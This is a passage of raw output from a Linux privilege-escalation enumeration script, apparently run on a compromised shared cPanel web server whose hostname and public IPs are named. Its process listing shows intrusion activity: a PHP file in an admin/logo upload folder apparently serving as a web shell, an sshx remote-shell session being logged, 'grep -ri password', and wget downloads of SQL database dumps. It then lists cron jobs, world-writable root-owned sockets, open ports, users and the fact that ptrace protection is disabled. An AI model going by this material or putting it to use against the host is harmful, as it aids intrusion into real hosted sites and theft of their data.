/home2/webapps1/mg.neowep.in/vendor/mpociot/reflection-docblock Process 2029429 (webapps1) - ls -l /home2/webapps1/mg.neowep.in/vendor/mpociot/reflection-docblock/.travis.yml └─ Has open files: └─ pipe:[4164903747] └─ pipe:[4165664669] Process 2031102 (webapps1) - sh └─ Has open files: └─ pipe:[4165937255] └─ pipe:[4165937257] Process 2031103 (webapps1) - tee all.txt └─ Has open files: └─ pipe:[4165937257] └─ /dev/pts/0 └─ /tmp/all.txt Process 2039764 (webapps1) - lsphp └─ Has open files: └─ /var/log/apache2/stderr.log Process 2064446 (webapps1) - sh └─ Has open files: └─ pipe:[4165937255] └─ pipe:[4165960134] └─ pipe:[4165937257] Process 3730677 (webapps1) - sh -c python3 main.py 2>&1 └─ Has open files: └─ pipe:[4136243682] └─ /var/log/apache2/stderr.log └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/2874-1737123350.php Process 3730678 (webapps1) - python3 main.py └─ Has open files: └─ pipe:[4136243682] └─ pipe:[4136997447] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/2874-1737123350.php └─ pipe:[4136288338] Process 3733756 (webapps1) - ping google.com └─ Has open files: └─ pipe:[4136288338] Process 3754123 (webapps1) - grep -ri password . └─ Has open files: └─ pipe:[4136997447] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/miniconda_env/pkgs/cryptography-46.0.3-py313h0a354b3_0/info/test/tests/hazmat/primitives/test_serialization.py └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/miniconda_env/pkgs/cryptography-46.0.3-py313h0a354b3_0/info/test └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/miniconda_env/pkgs/cryptography-46.0.3-py313h0a354b3_0/info/test/tests/hazmat/primitives └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/miniconda_env/pkgs/cryptography-46.0.3-py313h0a354b3_0/info/test/tests └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/miniconda_env/pkgs/cryptography-46.0.3-py313h0a354b3_0/info/test/tests/hazmat Process 3927298 (webapps1) - ./sshx └─ Has open files: └─ pipe:[4139807019] └─ /dev/ptmx └─ /var/log/apache2/stderr.log └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/2874-1737123350.php Process 3927299 (webapps1) - tee session.txt └─ Has open files: └─ pipe:[4139807019] └─ pipe:[4139817050] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/2874-1737123350.php └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/session.txt Process 3932565 (webapps1) - /bin/bash └─ Has open files: └─ /dev/pts/0 Process 3954182 (webapps1) - python3 speedtest.py --server 31122 └─ Has open files: └─ /dev/pts/0 Process 3955221 (webapps1) - python3 speedtest.py --server 32643 └─ Has open files: └─ /dev/pts/0 Process 3956294 (webapps1) - python3 speedtest.py --server 32643 └─ Has open files: └─ /dev/pts/0 Process 3956824 (webapps1) - python3 speedtest.py --server 32643 └─ Has open files: └─ /dev/pts/0 Process 3962385 (webapps1) - python3 - --simple └─ Has open files: └─ /dev/pts/0 Process 3980791 (webapps1) - clear └─ Has open files: └─ /dev/pts/0 Process 3988180 (webapps1) - du -sh /home2/webapps1/34.78.156.229 /home2/webapps1/4tbikecare.in /home2/webapps1/ANBINARAM.ORG /ho └─ Has open files: └─ /dev/pts/0 └─ pipe:[4140377831] └─ /home2/webapps1/mytolabs.com/Mobile/Patient/.git/objects/f0 └─ /home2/webapps1/mytolabs.com/Mobile/Patient/.git/objects └─ /home2/webapps1/mytolabs.com/Mobile/Patient └─ /home2/webapps1/mytolabs.com/Mobile/Patient/.git Process 3988181 (webapps1) - sort -rh └─ Has open files: └─ pipe:[4140377831] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/all_data.txt (deleted) └─ /dev/pts/0 Process 3992427 (webapps1) - du -h --max-depth=1 /home2/webapps1 └─ Has open files: └─ /dev/pts/0 └─ pipe:[4140419358] └─ /home2/webapps1/rjpinfotek.webappsdigital.com/vendor/google/apiclient-services/src/Google/Service/Speech └─ /home2/webapps1/rjpinfotek.webappsdigital.com/vendor/google/apiclient-services/src/Google └─ /home2/webapps1/rjpinfotek.webappsdigital.com/vendor/google/apiclient-services/src └─ /home2/webapps1/rjpinfotek.webappsdigital.com/vendor/google/apiclient-services/src/Google/Service Process 3992428 (webapps1) - sort -rh └─ Has open files: └─ pipe:[4140419358] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/all_data.txt (deleted) └─ /dev/pts/0 Process 4008700 (webapps1) - wget -qO- https://webappsdigital.com/webapps1_muralipickle.sql.gz └─ Has open files: └─ /dev/pts/0 └─ pipe:[4140569679] Process 4008701 (webapps1) - gzip -d └─ Has open files: └─ pipe:[4140569679] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/webapps1_muralipickle.sql └─ /dev/pts/0 Process 4009444 (webapps1) - wget -qO- https://webappsdigital.com/webapps1_muralipickle.sql.gz └─ Has open files: └─ /dev/pts/0 └─ pipe:[4140570064] Process 4009445 (webapps1) - gzip -d └─ Has open files: └─ pipe:[4140570064] └─ /home2/webapps1/amc.ishaneowep.com/admin/logo/webapps1_muralipickle.sql └─ /dev/pts/0 Process 4141273 (webapps1) - python3 main.py └─ Has open files: └─ /dev/pts/0 ╔══════════╣ Processes with memory-mapped credential files  ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user  ╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information  ╔══════════╣ Check for vulnerable cron jobs ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs ══╣ Cron jobs list /bin/crontab MAILTO="" 58 10,22 * * * cd /home2/webapps1/bombaysairam.in; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 57 9,21 * * * cd /home2/webapps1/businesscard.webappsdigital.com/blog; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 59 11,23 * * * cd /home2/webapps1/dharmapuritoday.com; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 0 0,12 * * * cd /home2/webapps1/iwineducationalservice.com; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 3 3,15 * * * cd /home2/webapps1/nextgengarage.in; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 4 4,16 * * * cd /home2/webapps1/statusflags.in; /bin/nice -n15 /usr/bin/php -q wp-cron.php >/dev/null 2>&1 incrontab Not Found  ══╣ Checking for specific cron jobs vulnerabilities Checking cron directories... ╔══════════╣ System timers ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers ══╣ Active timers: ══╣ Disabled timers: ══╣ Additional timer files: Potential privilege escalation in timer file: /lib/systemd/system/dnf-makecache.timer └─ RELATIVE_PATH: Uses relative path in Unit directive\n Potential privilege escalation in timer file: /usr/lib/systemd/system/dnf-makecache.timer └─ RELATIVE_PATH: Uses relative path in Unit directive\n ╔══════════╣ Services and Service Files ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services  ══╣ Active services:  ══╣ Disabled services:  ══╣ Additional service files: You can't write on systemd PATH ╔══════════╣ Systemd Information ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths ═╣ Systemd version and vulnerabilities? .............. systemctl Not Found ═╣ Services running as root? ..... systemctl Not Found  ═╣ Running services with dangerous capabilities? ... systemctl Not Found  ═╣ Services with writable paths? . systemctl Not Found  ╔══════════╣ Systemd PATH ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths systemctl Not Found  ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets  ╔══════════╣ Unix Sockets Analysis ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets /opt/alt/clos_ssa/run/ssa.sock └─(Read Write Execute (Weak Permissions: 777) ) └─(Owned by root) /opt/alt/php-xray/run/xray-user.sock └─(Read Write Execute (Weak Permissions: 777) ) └─(Owned by root) /opt/alt/php-xray/run/xray.sock └─(Read Write Execute (Weak Permissions: 777) ) └─(Owned by root) /opt/clwpos/wpos_redis_daemon.sock └─(Read Write Execute (Weak Permissions: 777) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.2A4yZYP/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.2A4yZYP/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.2A4yZYP/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.3cOd2kj/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.3cOd2kj/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.3cOd2kj/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.57mhPcw/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.57mhPcw/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.57mhPcw/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.BxWxgpP/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.BxWxgpP/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.BxWxgpP/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.FvCdtqA/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.FvCdtqA/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.FvCdtqA/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.NPmgRSL/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.NPmgRSL/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.NPmgRSL/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.Ubm6VDw/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.Ubm6VDw/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.Ubm6VDw/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.ZwfLWDm/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.ZwfLWDm/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.ZwfLWDm/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.awduraR/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.awduraR/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.awduraR/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.cr5E1r6/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.cr5E1r6/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.cr5E1r6/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gzeeFL6/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gzeeFL6/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.gzeeFL6/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.jDM9g4n/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.jDM9g4n/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.jDM9g4n/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.lw6FbfH/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.lw6FbfH/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.lw6FbfH/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.mS7fl2t/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.mS7fl2t/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.mS7fl2t/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.tDNdQ4q/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.tDNdQ4q/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.tDNdQ4q/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.wKBJQsL/agents.s/core └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.wKBJQsL/agents.s/core_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpanel/ea-ruby27/root/var/run/passenger-instreg/passenger.wKBJQsL/agents.s/watchdog_api └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /opt/cpguard/cpg-php-fpm/var/run/cpgphp-cgi.sock └─(Read Write (Weak Permissions: 666) ) /run/dbus/system_bus_socket └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /run/nscd/socket └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) /run/systemd/journal/dev-log.cagefs/dev-log /var/lib/mysql/mysql.sock └─(Read Write Execute (Weak Permissions: 777) ) /var/lib/proxyexec/cagefs.sock/socket └─(Read Write (Weak Permissions: 666) ) └─(Owned by root) ╔══════════╣ D-Bus Analysis ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus busctl Not Found  ══╣ D-Bus Session Bus Analysis (Access to session bus available) ╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust  ══╣ Listening r-services (TCP 512-514) ss|netstat Not Found  ══╣ systemd units exposing r-services systemctl Not Found  ══╣ inetd/xinetd configuration for r-services /etc/inetd.conf Not Found /etc/xinetd.d Not Found  ══╣ Installed r-service server packages dpkg|rpm Not Found  ══╣ /etc/hosts.equiv and /etc/shosts.equiv  ══╣ Per-user .rhosts files .rhosts Not Found  ══╣ PAM rhosts authentication /etc/pam.d/rlogin|rsh Not Found  ══╣ SSH HostbasedAuthentication /etc/ssh/sshd_config Not Found  ══╣ Potential DNS control indicators (local)  Not detected ╔══════════╣ Crontab UI (root) misconfiguration checks ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs crontab-ui Not Found   ╔═════════════════════╗ ══════════════════════════════╣ Network Information ╠══════════════════════════════  ╚═════════════════════╝ ╔══════════╣ Interfaces 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eno1: mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 08:bf:b8:a4:11:14 brd ff:ff:ff:ff:ff:ff altname enp5s0 inet 37.27.55.48/26 brd 37.27.55.63 scope global eno1 valid_lft forever preferred_lft forever inet 37.27.55.44/26 brd 37.27.55.63 scope global secondary eno1:0 valid_lft forever preferred_lft forever inet6 fe80::abf:b8ff:fea4:1114/64 scope link valid_lft forever preferred_lft forever ╔══════════╣ Hostname, hosts and DNS ══╣ Hostname Information System hostname: server351.iseencloud.com FQDN: server351.iseencloud.com ══╣ Hosts File Information Contents of /etc/hosts: 15.204.102.121 ipv4.license.configserver.com 15.204.102.121 license.configserver.com 147.135.65.48 api.sitepad.com 127.0.0.1 localhost 37.27.55.44 server351 37-27-55-48.cprapid.com 37-27-55-48 51.81.155.193 oldserver 37.27.55.48 server351.iseencloud.com server351 190.2.135.87 api.softaculous.com ══╣ DNS Configuration DNS Servers (resolv.conf): 1.1.1.1 8.8.8.8 DNS Domain Information: ╔══════════╣ Active Ports ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports ══╣ Active tcp Ports (from /proc/net/tcp) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name -------------------------------------------------------------------------------- tcp 00:00000000 00000000:00000000 0.0.0.0:2086 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2087 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:7080 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:3306 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:9098 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:587 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2091 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:110 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:143 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 127.0.0.1:783 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2095 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:111 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:80 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2096 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:465 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 127.0.0.1:27217 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:21 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:53 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:25 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 127.0.0.1:953 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:26 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:443 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:5309 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2077 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2078 0.0.0.0:0 LISTEN 2039764/lsphp tcp 00:00000000 00000000:00000000 0.0.0.0:2079 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2080 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:993 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2082 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:995 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 127.0.0.1:579 0.0.0.0:0 LISTEN / tcp 00:00000000 00000000:00000000 0.0.0.0:2083 0.0.0.0:0 LISTEN / ══╣ Active udp Ports (from /proc/net/udp) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name -------------------------------------------------------------------------------- ╔══════════╣ Network Traffic Analysis Capabilities  ══╣ Available Sniffing Tools No sniffing tools found ══╣ Network Interfaces Sniffing Capabilities Interface eno1: Not sniffable No sniffable interfaces found ╔══════════╣ Firewall Rules Analysis  ══╣ Iptables Rules iptables Not Found  ══╣ Nftables Rules nftables Not Found  ══╣ Firewalld Rules firewalld Not Found  ══╣ UFW Rules ufw Not Found  ╔══════════╣ Inetd/Xinetd Services Analysis  ══╣ Inetd Services inetd Not Found  ══╣ Xinetd Services xinetd Not Found  ══╣ Running Inetd/Xinetd Services  Running Service Processes: ╔══════════╣ Internet Access? Port 80 is accessible Port 443 is accessible ICMP is accessible Port 443 is accessible with curl DNS is not accessible ╔══════════╣ Is hostname malicious or leaked? ╚ This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host. { "hostname": "server351.iseencloud.com", "source_ip": "37.27.55.48", "checks": { "IP in AbuseIPDB": { "rate_limited": true, "status": 429 }, "Hostname in Pastes": { "error": "HTTP Error 400: Bad Request" }, "IP in VirusTotal": { "malicious": false, "reason": { "malicious": 0, "suspicious": 0, "undetected": 35, "harmless": 60, "timeout": 0 }, "reputation": 0 }, "Hostname in VirusTotal": { "malicious": false, "reason": { "malicious": 0, "suspicious": 0, "undetected": 32, "harmless": 63, "timeout": 0 }, "reputation": 0 }, "Hostname in OTX": { "malicious": false, "count": 0, "references": [] }, "IP in MalwareWorld": { "error": "The read operation timed out" } } }  ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════  ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users uid=1710(webapps1) gid=1714(webapps1) groups=1714(webapps1) ╔══════════╣ PGP Keys and Related Files ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys GPG: GPG is installed, listing keys:  NetPGP: netpgpkeys Not Found  PGP Related Files: Found: /home/webapps1/.gnupg total 44 drwx------ 2 webapps1 webapps1 4096 Dec 23 18:11 . drwx--x--x 559 webapps1 webapps1 28672 Dec 23 17:48 .. -rw------- 1 webapps1 webapps1 32 Dec 23 17:48 pubring.kbx -rw------- 1 webapps1 webapps1 1200 Dec 23 17:48 trustdb.gpg ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid  ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens ptrace protection is disabled (0), so sudo tokens could be abused doas.conf Not Found  ╔══════════╣ Checking Pkexec and Polkit ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2  ══╣ Polkit Binary  ══╣ Polkit Policies  ══╣ Polkit Authentication Agent  ╔══════════╣ Superusers and UID 0 Users ╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html  ══╣ Users with UID 0 in /etc/passwd root:x:0:0:root:/root:/bin/bash ══╣ Users with sudo privileges in sudoers  ╔══════════╣ Users with console root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=968(mysyslog),0(root) uid=1(bin) gid=1(bin) groups=1(bin) uid=11(operator) gid=0(root) groups=0(root) uid=12(games) gid=100(users) groups=100(users) uid=14(ftp) gid=50(ftp) groups=50(ftp) uid=1710(webapps1) gid=1714(webapps1) groups=1714(webapps1) uid=2(daemon[0m) gid=2(daemon[0m) groups=968(mysyslog),2(daemon[0m) uid=25(named) gid=25(named) groups=968(mysyslog),25(named) uid=28(nscd) gid=28(nscd) groups=28(nscd) uid=29(rpcuser) gid=29(rpcuser) groups=968(mysyslog),29(rpcuser) uid=3(adm) gid=4(adm) groups=4(adm) uid=32(rpc) gid=32(rpc) groups=968(mysyslog),32(rpc) uid=4(lp) gid=7(lp) groups=7(lp) uid=47(mailnull) gid=47(mailnull) groups=968(mysyslog),47(mailnull) uid=5(sync) gid=0(root) groups=0(root) uid=6(shutdown) gid=0(root) groups=0(root) uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) uid=7(halt) gid=0(root) groups=0(root) uid=74(sshd) gid=74(sshd) groups=74(sshd) uid=8(mail) gid=12(mail) groups=968(mysyslog),12(mail) uid=81(dbus) gid=81(dbus) groups=968(mysyslog),81(dbus) uid=97(dovecot) gid=97(dovecot) groups=968(mysyslog),97(dovecot) uid=984(mysql) gid=981(mysql) groups=968(mysyslog),981(mysql) uid=990(cpaneleximfilter) gid=987(cpaneleximfilter) groups=987(cpaneleximfilter) uid=994(mailman) gid=991(mailman) groups=991(mailman),974(linksafe),1002(clsupergid),968(mysyslog) ╔══════════╣ Currently Logged in Users  ══╣ Basic user information  ══╣ Active sessions  ══╣ Logged in users (utmp)  ══╣ SSH sessions  ══╣ Screen sessions No Sockets found in /run/screen/S-webapps1. ══╣ Tmux sessions  ╔══════════╣ Last Logons and Login History  ══╣ Last logins  ══╣ Failed login attempts  ══╣ Recent logins from auth.log (limit 20)  ╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)  ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!    ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════  ╚══════════════════════╝ ╔══════════╣ Useful software /bin/base64 /bin/curl /bin/make /bin/perl /usr/local/bin/php /bin/ping /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/python /bin/python2 /bin/python2.7 /home2/webapps1/amc.ishaneowep.com/admin/logo/my_libs/bin/python3 /bin/python3.6 /bin/wget ╔══════════╣ Installed Compilers  ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: apache2 Not Found httpd Not Found  Nginx version: nginx Not Found  ══╣ PHP exec extensions  lrwxrwxrwx 1 webapps1 webapps1 26 Aug 23 06:55 /etc/cl.selector/php.ini -> /opt/alt/php82/etc/php.ini allow_url_fopen = On allow_url_include = Off odbc.allow_persistent = On mysqli.allow_persistent = On pgsql.allow_persistent = On -rw-r--r-- 1 root linksafe 46178 Dec 23 03:37 /opt/alt/php56/etc/php.ini allow_call_time_pass_reference = 